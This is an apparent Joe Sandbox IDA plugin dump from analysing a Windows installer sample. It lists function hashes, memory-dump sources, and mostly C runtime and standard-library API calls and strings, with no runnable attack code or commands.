                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 0-537541572
                          • Opcode ID: a41c72e4f26b081baf7c292d05925779f4483e49456d3603cf8451684f432c01
                          • Instruction ID: c391bbb0e90e987ce6dc6f7767c1593e3c0d620b6eb9c4bc88434c6e8dc96ed2
                          • Opcode Fuzzy Hash: a41c72e4f26b081baf7c292d05925779f4483e49456d3603cf8451684f432c01
                          • Instruction Fuzzy Hash: 8E21D831A05331ABDB21DA69DC48A5A3778BF03768F1D4711ED15EB684E638EDC1C5E0
                          APIs
                          • GetConsoleCP.KERNEL32(?,6CA29EF0,?), ref: 6CA2AD19
                          • __fassign.LIBCMT ref: 6CA2AEF8
                          • __fassign.LIBCMT ref: 6CA2AF15
                          • WriteFile.KERNEL32(?,6CA348D6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA2AF5D
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CA2AF9D
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA2B049
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                           • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ConsoleErrorLast
                          • String ID:
                          • API String ID: 4031098158-0
                          • Opcode ID: 67bb64e0c87fec00748233c4e217a89f4b29553ee3459d1bf5ea9b83cd28a3b7
                          • Instruction ID: 10d32c293802b47961576f51b0960eedefffee00caa8096ed9c69e663c305d73
                          • Opcode Fuzzy Hash: 67bb64e0c87fec00748233c4e217a89f4b29553ee3459d1bf5ea9b83cd28a3b7
                          • Instruction Fuzzy Hash: ABD1BB71E052689FCF15CFA8C8809EDFBB6BF09314F284169E855BB641D735AD8ACB10
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aulldiv
                          • String ID: >WJ$x$x
                          • API String ID: 3732870572-3162267903
                          • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                          • Instruction ID: 4744fb32d185dac6d0999c11ab1977ae3aca263c1d4360342eded8a7875eb6c8
                          • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                          • Instruction Fuzzy Hash: 04128A71D00249EFDF10CFA6C990AEDBBB5FF08318F248169E915ABA50DB359989CF50
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C8E2F95
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C8E2FAF
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C8E2FD0
                          • __Getctype.LIBCPMT ref: 6C8E3084
                          • std::_Facet_Register.LIBCPMT ref: 6C8E309C
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C8E30B7
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                           • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                          • String ID:
                          • API String ID: 1102183713-0
                          • Opcode ID: 3c9c869bff4dd12c1d6430aedaa6653423a05ba86e2239a247750aab34074576
                          • Instruction ID: bf4cc32c600417e2c83944a3a37663b604e9bbc11335f8a252835e5c7d6bce69
                          • Opcode Fuzzy Hash: 3c9c869bff4dd12c1d6430aedaa6653423a05ba86e2239a247750aab34074576
                          • Instruction Fuzzy Hash: 514189B1E04218CFCB24CF88CA59B9EB7B0FF5A724F144528D859ABB50D734AD48CB91
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aulldiv$__aullrem
                          • String ID:
                          • API String ID: 2022606265-0
                          • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                          • Instruction ID: a5859a6f6c41655d6ba1f3db79b082bf5d20698f0d7f9a9b648124dfc5e75a1f
                          • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                          • Instruction Fuzzy Hash: 5521E370902319BFDF108E959D40DDF7A69EB857A8FA0C225B52062690D2718EE4D7A1
                          APIs
                          • _free.LIBCMT ref: 6CA348FD
                          • _free.LIBCMT ref: 6CA34926
                          • SetEndOfFile.KERNEL32(00000000,6CA3350C,00000000,6CA29EF0,?,?,?,?,?,?,?,6CA3350C,6CA29EF0,00000000), ref: 6CA34958
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA3350C,6CA29EF0,00000000,?,?,?,?,00000000,?), ref: 6CA34974
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                           • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: _free$ErrorFileLast
                          • String ID: 8Q
                          • API String ID: 1547350101-4022487301
                          • Opcode ID: 91eea70bcc3976cb3e49cc994192cf2f3a0a525d85dd2d9a96efeae9b1c7bf24
                          • Instruction ID: 3790a16d1618f2da05cedabeefa0f52eefcc658ad74163f15d0b4f53406193c8
                          • Opcode Fuzzy Hash: 91eea70bcc3976cb3e49cc994192cf2f3a0a525d85dd2d9a96efeae9b1c7bf24
                          • Instruction Fuzzy Hash: 7941D4325056659ADB019BF8CD54BCE7F79AF45328F282210E828E7B90DB36C8CD8765
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CA1DFD4,00000000,?,6CA1E055,6CA18A69,00000003,00000000), ref: 6CA1DF5F
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CA1DF72
                          • FreeLibrary.KERNEL32(00000000,?,?,6CA1DFD4,00000000,?,6CA1E055,6CA18A69,00000003,00000000), ref: 6CA1DF95
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                           • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 28665779dcb756f993bb5306db7996649a3ff23119bf75751ef674536ff41575
                          • Instruction ID: e6f12ca0f051d3e55ad8ac198e5bffe348e6c6d04cc969219e550b5ee249c9cd
                          • Opcode Fuzzy Hash: 28665779dcb756f993bb5306db7996649a3ff23119bf75751ef674536ff41575
                          • Instruction Fuzzy Hash: B2F08C30A0522AFFDF06AF50CC0DB9E7A79EB0135AF208164F805E2850CB318F41DAA1
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6CA1614E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6CA16159
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA161C7
                            • Part of subcall function 6CA16050: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CA16068
                          • std::locale::_Setgloballocale.LIBCPMT ref: 6CA16174
                          • _Yarn.LIBCPMT ref: 6CA1618A
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                           • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                          • String ID:
                          • API String ID: 1088826258-0
                          • Opcode ID: ee2a6783ad04249bb6f5fd41c82cb9ce5b663cf8cf95e84ed89283f7fe01c887
                          • Instruction ID: 38d657525bad33aae42ebcbe6f6e174fdf9b99bca7046cf29fd154a02e3d25fc
                          • Opcode Fuzzy Hash: ee2a6783ad04249bb6f5fd41c82cb9ce5b663cf8cf95e84ed89283f7fe01c887
                          • Instruction Fuzzy Hash: 5C018475A045219FDB06DF20C959ABD7771FF96664B140009D805D7F80CF346E8ACB81
                          APIs
                            • Part of subcall function 6CA16147: __EH_prolog3.LIBCMT ref: 6CA1614E
                            • Part of subcall function 6CA16147: std::_Lockit::_Lockit.LIBCPMT ref: 6CA16159
                            • Part of subcall function 6CA16147: std::locale::_Setgloballocale.LIBCPMT ref: 6CA16174
                            • Part of subcall function 6CA16147: _Yarn.LIBCPMT ref: 6CA1618A
                            • Part of subcall function 6CA16147: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA161C7
                            • Part of subcall function 6C8E2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C8E2F95
                            • Part of subcall function 6C8E2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C8E2FAF
                            • Part of subcall function 6C8E2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C8E2FD0
                            • Part of subcall function 6C8E2F60: __Getctype.LIBCPMT ref: 6C8E3084
                            • Part of subcall function 6C8E2F60: std::_Facet_Register.LIBCPMT ref: 6C8E309C
                            • Part of subcall function 6C8E2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C8E30B7
                          • std::ios_base::_Addstd.LIBCPMT ref: 6C8E211B
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                           • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 3332196525-1866435925
                          • Opcode ID: 478e8252c51201b78e45d76b62a98066a43fb3281b032b019725b90bf5ddb6fa
                          • Instruction ID: 2a8ce2f8e95f65a6d85cad2464cdbf6340b07d16bb3c7a3a1898d406e51208de
                          • Opcode Fuzzy Hash: 478e8252c51201b78e45d76b62a98066a43fb3281b032b019725b90bf5ddb6fa
                          • Instruction Fuzzy Hash: 0641D3B0E0030A8FDB10CF64C9497AEBBB1FF49314F148668E519AB791E775E985CB90
                          APIs
                          • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CA29EF0,6C8E1DEA,00008000,6CA29EF0,?,?,?,6CA29A9F,6CA29EF0,?,00000000,6C8E1DEA), ref: 6CA29BE9
                          • GetLastError.KERNEL32(?,?,?,6CA29A9F,6CA29EF0,?,00000000,6C8E1DEA,?,6CA334BE,6CA29EF0,000000FF,000000FF,00000002,00008000,6CA29EF0), ref: 6CA29BF3
                          • __dosmaperr.LIBCMT ref: 6CA29BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                           • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer__dosmaperr
                          • String ID: 8Q
                          • API String ID: 2336955059-4022487301
                          • Opcode ID: 539104bcd2e18d39e03ac55c58518a6a8fb11d925aae62a5d94a47fe6a2efcd5
                          • Instruction ID: 9f495f646dc5d3d639c45713b828c8d03bbb84e573c42984a1805fd95024c173
                          • Opcode Fuzzy Hash: 539104bcd2e18d39e03ac55c58518a6a8fb11d925aae62a5d94a47fe6a2efcd5
                          • Instruction Fuzzy Hash: 6901FC327145256FCB058F79CD4989E7B79EB86734B2C4208F415DBA80EB75D98187A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: <J$DJ$HJ$TJ$]
                          • API String ID: 0-686860805
                          • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                          • Instruction ID: 733562d43fb60f69c92c33810097cd83a92cd807374fca5223bfe4aeda7fd10e
                          • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                          • Instruction Fuzzy Hash: CE41A270C05349AFCF14DBB2E7908EEB774AF11208B64C16AD02167E91EB35A6CDCB51
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aulldiv
                          • String ID:
                          • API String ID: 3732870572-0
                          • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                          • Instruction ID: 24c707fea7c88df5bdb315a6dca10b1b16020f07d2499f2a7a7c6385c3ed8bce
                          • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                          • Instruction Fuzzy Hash: 5711E7762003447FEB248AA6DC54EAFBBBDEFC9744F10881DF14252E50DA71AC88D7A0
                          APIs
                          • GetLastError.KERNEL32(00000008,?,00000000,6CA27273), ref: 6CA237D7
                          • _free.LIBCMT ref: 6CA23834
                          • _free.LIBCMT ref: 6CA2386A
                          • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CA23875
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                           • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ErrorLast_free
                          • String ID:
                          • API String ID: 2283115069-0
                          • Opcode ID: 7dc8d301cf26f0e1c20836819000816bdb31c22a9411759c992da51f9bb9b5de
                          • Instruction ID: 2da04b910941de51146decd2572ca30d1500defd9b0ad84f8cf852f96ecb6417
                          • Opcode Fuzzy Hash: 7dc8d301cf26f0e1c20836819000816bdb31c22a9411759c992da51f9bb9b5de
                          • Instruction Fuzzy Hash: F211A37230A6216E9B015AB94D8996A256DEBC33BC73D0724F16587E90EF2ACC8D5110
                          APIs
                          • WriteConsoleW.KERNEL32(00000000,?,6CA3350C,00000000,00000000,?,6CA33971,00000000,00000001,00000000,6CA29EF0,?,6CA2B0A6,?,?,6CA29EF0), ref: 6CA34CF1
                          • GetLastError.KERNEL32(?,6CA33971,00000000,00000001,00000000,6CA29EF0,?,6CA2B0A6,?,?,6CA29EF0,?,6CA29EF0,?,6CA2AB3C,6CA348D6), ref: 6CA34CFD
                            • Part of subcall function 6CA34D4E: CloseHandle.KERNEL32(FFFFFFFE,6CA34D0D,?,6CA33971,00000000,00000001,00000000,6CA29EF0,?,6CA2B0A6,?,?,6CA29EF0,?,6CA29EF0), ref: 6CA34D5E
                          • ___initconout.LIBCMT ref: 6CA34D0D
                            • Part of subcall function 6CA34D2F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CA34CCB,6CA3395E,6CA29EF0,?,6CA2B0A6,?,?,6CA29EF0,?), ref: 6CA34D42
                          • WriteConsoleW.KERNEL32(00000000,?,6CA3350C,00000000,?,6CA33971,00000000,00000001,00000000,6CA29EF0,?,6CA2B0A6,?,?,6CA29EF0,?), ref: 6CA34D22
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                           • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: dc8009918c03e244a1beac1a222298ceaa069b80e24975e9adf4b7dfd088faa8
                          • Instruction ID: a9cbd0b1b15b2697892efd1859e08d13cd0d4e8c768fa2e5d60a474a1d65e308
                          • Opcode Fuzzy Hash: dc8009918c03e244a1beac1a222298ceaa069b80e24975e9adf4b7dfd088faa8
                          • Instruction Fuzzy Hash: 8FF01C36600229BBCF522FD1DC099893F36FB0A7E6B088510FA08C6620DA7388659B90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aulldiv
                          • String ID: $SJ
                          • API String ID: 3732870572-3948962906
                          • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                          • Instruction ID: 3f0499fdd8796800038d21dce9031a1f7801d8c2b655ca540e9272dfe1f792a6
                          • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                          • Instruction Fuzzy Hash: 16B16EB1D00249DFCB14CF6AC9809AEBBB1FF48318F64862ED555A7B50D730AAC5CB94
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                           • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                           • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: H_prolog3_
                          • String ID: 8Q
                          • API String ID: 2427045233-4022487301
                          • Opcode ID: eefdcb50d792f3d85edae2e37e40b844bbe5e24134d88b5214a80cf9e4e1305f
                          • Instruction ID: 31cca1b1b8e718e4dbc6a777a29bf878d2e2ebd9a941325cf3d915dca19a027a
                          • Opcode Fuzzy Hash: eefdcb50d792f3d85edae2e37e40b844bbe5e24134d88b5214a80cf9e4e1305f
                          • Instruction Fuzzy Hash: AB71D634D1522A9BDB108F95C988EFFB679AF45338F1C4316EA2067A90D77988C6C760
                          APIs
                          • ___std_exception_destroy.LIBVCRUNTIME ref: 6C8E2A76
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ___std_exception_destroy
                          • String ID: Jbx$Jbx
                          • API String ID: 4194217158-1161259238
                          • Opcode ID: 6e500e0c1cac3fc7f150294dbe7754e57cd865437b49890140fe4c925b12f343
                          • Instruction ID: 42301d5cff854bf15891dc196beb109276e1458a6587e163ea45e990a61d4648
                          • Opcode Fuzzy Hash: 6e500e0c1cac3fc7f150294dbe7754e57cd865437b49890140fe4c925b12f343
                          • Instruction Fuzzy Hash: 095116B1900205CFCB24CF58D984A9EB7B5FF8A314F14896DD849DBB41D335E989CB91
                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CA334F6), ref: 6CA2BE3B
                          • __dosmaperr.LIBCMT ref: 6CA2BE42
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ErrorLast__dosmaperr
                          • String ID: 8Q
